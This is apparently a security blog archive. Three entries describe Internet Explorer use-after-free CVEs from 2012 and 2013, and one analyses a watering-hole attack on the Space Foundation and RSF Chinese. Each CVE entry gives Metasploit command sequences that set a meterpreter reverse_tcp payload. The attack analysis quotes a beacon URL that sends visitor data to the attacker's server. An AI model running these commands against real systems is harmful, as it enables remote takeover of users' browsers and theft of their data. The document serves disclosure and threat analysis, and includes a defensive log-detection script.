Tag Archives: IE 0Day

CVE-2013-3897 Microsoft Internet Explorer CDisplayPointer Use-After-Free

Timeline :

Vulnerability discovered exploited in the wild in 2013-09
Patched by the vendor via MS13-080 on 2013-10-08
Metasploit PoC provided on 2013-10-12

PoC provided by :

Unknown
sinn3r

Reference(s) :

CVE-2013-3897
MS13-080

Affected version(s) :

Internet Explorer 6, 7, 8, 9, 10 and 11.

Tested on :

Internet Explorer 8 on Windows XP SP3

Description :

This module exploits a vulnerability found in Microsoft Internet Explorer. It was originally found being exploited in the wild targeting Japanese and Korean IE8 users on Windows XP, around the same time frame as CVE-2013-3893, except this was kept out of the public eye by multiple research companies and the vendor until the October patch release. This issue is a use-after-free vulnerability in CDisplayPointer via the use of an “onpropertychange” event handler. To set up the appropriate buggy conditions, we first craft the DOM tree in a specific order, where a CBlockElement comes after the CTextArea element. If we use a select() function for the CTextArea element, two important things will happen: a CDisplayPointer object will be created for CTextArea, and it will also trigger another event called “onselect”. The “onselect” event will allow us to set up for the actual event handler we want to abuse – the “onpropertychange” event. Since the CBlockElement is a child of CTextArea, if we do a node swap of CBlockElement in “onselect”, this will trigger “onpropertychange”. During “onpropertychange” event handling, a free of the CDisplayPointer object can be forced by using an “Unselect” (other approaches also apply), but a reference of this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after the CDoc::GetLineInfo call, because it is still trying to use that to update CDisplayPointer’s position. When this invalid reference arrives in QIClassID, a crash finally occurs due to accessing the freed memory. By controlling this freed memory, it is possible to achieve arbitrary code execution under the context of the user.

Commands :

use exploit/windows/browser/ms13_080_cdisplaypointer
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

getuid
sysinfo

CVE-2013-3893 Microsoft Internet Explorer SetMouseCapture UAF

Timeline :

Vulnerability discovered exploited in the wild on 2013-08-23
Microsoft published Microsoft Security Advisory 2887505 on 2013-09-17
Microsoft published a Fix it workaround on 2013-09-17
Metasploit PoC provided on 2013-09-30
Patched by the vendor via MS13-080 on 2013-10-08

PoC provided by :

Unknown
sinn3r
Rich Lundeen

Reference(s) :

CVE-2013-3893
MS13-080
MSA-2887505

Affected version(s) :

Internet Explorer 6, 7, 8, 9, 10 and 11.

Tested on :

Internet Explorer 8 on Windows XP SP3

Description :

This module exploits a use-after-free vulnerability that currently targets Internet Explorer 9 on Windows 7, but the flaw should exist in versions 6/7/8/9/10/11. It was initially found in the wild in Japan, but other regions such as English, Chinese, Korean, etc. were targeted as well. The vulnerability is due to how the mshtml!CDoc::SetMouseCapture function handles a reference during an event. An attacker can first set up two elements, where the second is the child of the first, and then set up an onlosecapture event handler for the parent element. The onlosecapture event seems to require two setCapture() calls to trigger, one for the parent element, one for the child. When the setCapture() call for the child element is called, it finally triggers the event, which allows the attacker to cause an arbitrary memory release using document.write(), which in particular frees up a 0x54-byte memory. The exact size of this memory may differ based on the version of IE. After the free, an invalid reference will still be kept and passed on to more functions; eventually this arrives in function MSHTML!CTreeNode::GetInterface, and causes a crash (or arbitrary code execution) when this function attempts to use this reference to call what appears to be a PrivateQueryInterface due to the offset (0x00). To mimic the same exploit found in the wild, this module will try to use the same DLL from Microsoft Office 2007 or 2010 to leverage the attack.

Commands :

use exploit/windows/browser/ie_setmousecapture_uaf
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

getuid
sysinfo

CVE-2013-3163 Microsoft Internet Explorer CAnchorElement UAF

Timeline :

Vulnerability discovered exploited in targeted attacks
Vulnerability reported to the vendor by Jose Antonio Vazquez Gonzalez via VeriSign iDefense Labs
Patched by the vendor on 2013-07-09
Metasploit PoC provided on 2013-09-09

PoC provided by :

Jose Antonio Vazquez Gonzalez
Orange Tsai
Peter Vreugdenhil
sinn3r

Reference(s) :

CVE-2013-3163
OSVDB-94981
MS13-055

Affected version(s) :

All versions of Internet Explorer 8 on Windows.

Tested on :

Internet Explorer 8 on Windows 7 SP1

Description :

In IE8 standards mode, it’s possible to cause a use-after-free condition by first creating an illogical table tree, where a CPhraseElement comes after CTableRow, with the final node being a sub table element. When the CPhraseElement’s outer content is reset by using either outerText or outerHTML through an event handler, this triggers a free of its child element (in this case, a CAnchorElement, but some other objects apply too), but a reference is still kept in function SRunPointer::SpanQualifier. This function will then pass on the invalid reference to the next functions, eventually used in mshtml!CElement::Doc when it’s trying to make a call to the object’s SecurityContext virtual function at offset +0x70, which results in a crash. An attacker can take advantage of this by first creating a CAnchorElement object, letting it be freed, and then replacing the freed memory with another fake object. Successfully doing so may allow arbitrary code execution under the context of the user. This bug is specific to Internet Explorer 8 only. It was originally discovered by Jose Antonio Vazquez Gonzalez and reported to iDefense, but was discovered again by Orange Tsai at Hitcon 2013.

Commands :

use exploit/windows/browser/ms13_055_canchor
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

sysinfo

Forgotten Watering Hole Attacks On Space Foundation and RSF Chinese

As I announced on Twitter, this blog post presents targeted attacks that started in mid-September and were not discussed or presented in public. These attacks ended around mid-October.

A web site, “arpeggio8.com”, hosted on 205.186.179.195 in the US, was compromised in order to be used in a watering hole attack against the Space Foundation and RSF Chinese.

The Space Foundation is a nonprofit organization that supports the global space industry through information and education programs. It is a resource for the entire space community – industry, national security organizations, civil space agencies, private space companies and the military around the world. It also supports educators, students and journalists with information and education programs.

Reporters Without Borders (RWB) is a French-based international non-governmental organization that advocates freedom of the press and freedom of information. Reporters Without Borders is also known as RSF, and RSF Chinese is a dedicated web site for Chinese news in Chinese language.

The watering hole attack was carried out through several files and a dedicated, centralized backend named “Jsbug”.

Description of the watering hole attack

The Space Foundation and RSF Chinese web sites had in their code a malicious JavaScript inclusion calling “http://www.arpeggio8.com/count/count.php”.

[Image: SpaceFoundation-RSFChinese-CVE-2012-4969]

The “count.php” script provides JavaScript content that checks for the presence of a “popad” cookie and whether the browser is Internet Explorer 6, 7 or 8. This script also loads “count2.php”, which is used for other purposes; we will discuss that file later. If all the conditions are met, the “rsf.php” file is loaded with the parameter “id=1024”.

The “rsf.php” script only provides content if the parameter “id=1024” is present. This script loads the “ie.html” file through an iframe. “rsf.php” is the equivalent of “exploit.html” in the CVE-2012-4969 0day found in mid-September.

The “ie.html” file is the equivalent of “Protect.html” in the CVE-2012-4969 0day found in mid-September, but here no Flash file is involved in the heap spray. The “ie.html” file contains packed JavaScript code that performs the heap spray and triggers the vulnerability. Pastebin: encoded version and decoded version.

The JavaScript is decoded through the “decode” function, with the key “0xe1” passed as an argument for decoding. The JavaScript “int_to_hex” function checks whether Oracle Java 6 is present, whether the operating system is Windows 7 or XP, and whether Internet Explorer 9 is used. The script also gathers the browser language.

[Image: decode]

If Windows XP is used and the language is “en-us”, “zh-cn”, “zh-tw”, “ko” or “ja” (hum hum, CVE-2012-4792…), then the vulnerability is triggered.

If Windows 7 is used and Java 6 is installed, then the vulnerability is triggered. A spray base value is provided in the code for Internet Explorer 9, but “count.php” has already filtered the targeted browsers.

Once the vulnerability is triggered, the “917.exe” (6b4aa596e5a4208371942cdb0e04dfd9) file is installed. This malware is known as “Trojan-Dropper.Win32.Dapato.bscc”.

An interesting point regarding the “ie.html” file: it was dated 19 September.

[Image: rsf-ie-cve-2012-4969]

Some facts regarding CVE-2012-4969 :

  • Vulnerability was discovered exploited in the wild, with a Flash variant, on 14 September.
  • Metasploit PoC was provided on 17 September.
  • Microsoft Security Advisory MSA-2757760 was published on 17 September.
  • Microsoft patch was provided in MS12-063 on 21 September.

But you will see in the next chapter that the attack began on 18 September.

“count2.php” script and Jsbug backend usage

The “count2.php” script is loaded in all cases, for statistics purposes. This script creates and checks two cookies, “stat_cookie” and “stat_time”, and gathers the Adobe Flash version, the presence of Oracle Java and the HTTP referrer. All this information is sent back to the same script as parameters:

http://arpeggio8.com/count/count2.php?n='+Math.random()+'&action=jpg&stat_refer='+escape(location.href)+'&stat_flash='+escape(flashVer)+'&stat_java='+escape(stat_java)+'&stat_cookie='+stat_cookie+'&stat_time='+stat_time;
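As an added example (not part of the original post, and not the Jsbug or attacker code), the following Python script reads constructed proxy-log lines and flags clients that walked the count.php, rsf.php?id=1024, ie.html chain described above, while extracting the stat_* fields from count2.php beacons. The "client_ip method url" log format and all sample values are assumptions.

```python
from collections import defaultdict
from urllib.parse import urlparse, parse_qs

# Constructed sample proxy lines ("client_ip method url"), not real captures.
SAMPLE_LOG = """\
10.0.0.5 GET http://www.arpeggio8.com/count/count.php
10.0.0.5 GET http://arpeggio8.com/count/count2.php?n=0.42&action=jpg&stat_refer=http%3A%2F%2Fwww.example.org%2F&stat_flash=11.4.402&stat_java=1&stat_cookie=abc&stat_time=1348000000
10.0.0.5 GET http://www.arpeggio8.com/count/rsf.php?id=1024
10.0.0.5 GET http://www.arpeggio8.com/count/ie.html
10.0.0.9 GET http://www.arpeggio8.com/count/count.php
"""
# Ordered stages of the exploit chain: count.php -> rsf.php?id=1024 -> ie.html.
CHAIN = [
    ("count.php", lambda q: True),
    ("rsf.php", lambda q: q.get("id") == ["1024"]),
    ("ie.html", lambda q: True),
]

def stat_beacon_fields(url):
    """Return the stat_* parameters of a count2.php beacon, or None."""
    u = urlparse(url)
    if not (u.netloc.endswith("arpeggio8.com") and u.path.endswith("/count/count2.php")):
        return None
    q = parse_qs(u.query, keep_blank_values=True)
    return {k: v[0] for k, v in q.items() if k.startswith("stat_")}

def chain_stage(url):
    """Return the index of the chain stage this URL matches, or -1."""
    u = urlparse(url)
    if not u.netloc.endswith("arpeggio8.com"):
        return -1
    q = parse_qs(u.query)
    for i, (name, ok) in enumerate(CHAIN):
        if u.path.endswith("/count/" + name) and ok(q):
            return i
    return -1

def analyze(log_text):
    """Per client: highest chain stage reached and the beacon's stat_* fields."""
    stage, beacons = defaultdict(lambda: -1), {}
    for line in log_text.splitlines():
        ip, _method, url = line.split(" ", 2)
        stage[ip] = max(stage[ip], chain_stage(url))
        fields = stat_beacon_fields(url)
        if fields is not None:
            beacons[ip] = fields
    # Clients that reached ie.html were served the CVE-2012-4969 exploit page.
    exploited = sorted(ip for ip, s in stage.items() if s == 2)
    return exploited, dict(stage), beacons
```

A client stuck at stage 0 only received the filtering script, which is what the "popad" cookie and browser checks produce for non-targeted visitors.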

All this information is stored in a backend named “Jsbug”. This backend is quite simple, with only three menus: “Client statistics”, “Report” and “Create Exploit”. The backend doesn’t have any external CSS or image files, and is typically composed of at least three PHP scripts.

[Image: jsbug-backend-typical-files]

The login page of the backend is also quite simplistic: no page title, no text on the page, and this simplicity makes it harder to discover through Google searches.

[Image: jsbug-backend-login-page]

The “Client statistics” menu directs you to a recap page of all visitors who loaded “count2.php”, with OS type, browser type and version, Adobe Flash version, Oracle Java version, IP address, HTTP referrer, number of visits, and first and last visit dates.

In the case of the Space Foundation watering hole attack, the first entries begin on 18 September.

[Image: jsbug-space-foundation-start]

In the case of the RSF Chinese watering hole attack, the first entries begin on 19 September.

[Image: jsbug-rsf-chinese-start]

These attacks have ended around mid-October.

The “Report” menu directs you to a statistics page for all visitors.

[Image: jsbug-backend-stats]

The “Create Exploit” menu is a page that helps the attackers generate their JavaScript inclusion code.

[Image: jsbug-backend-create-exploit]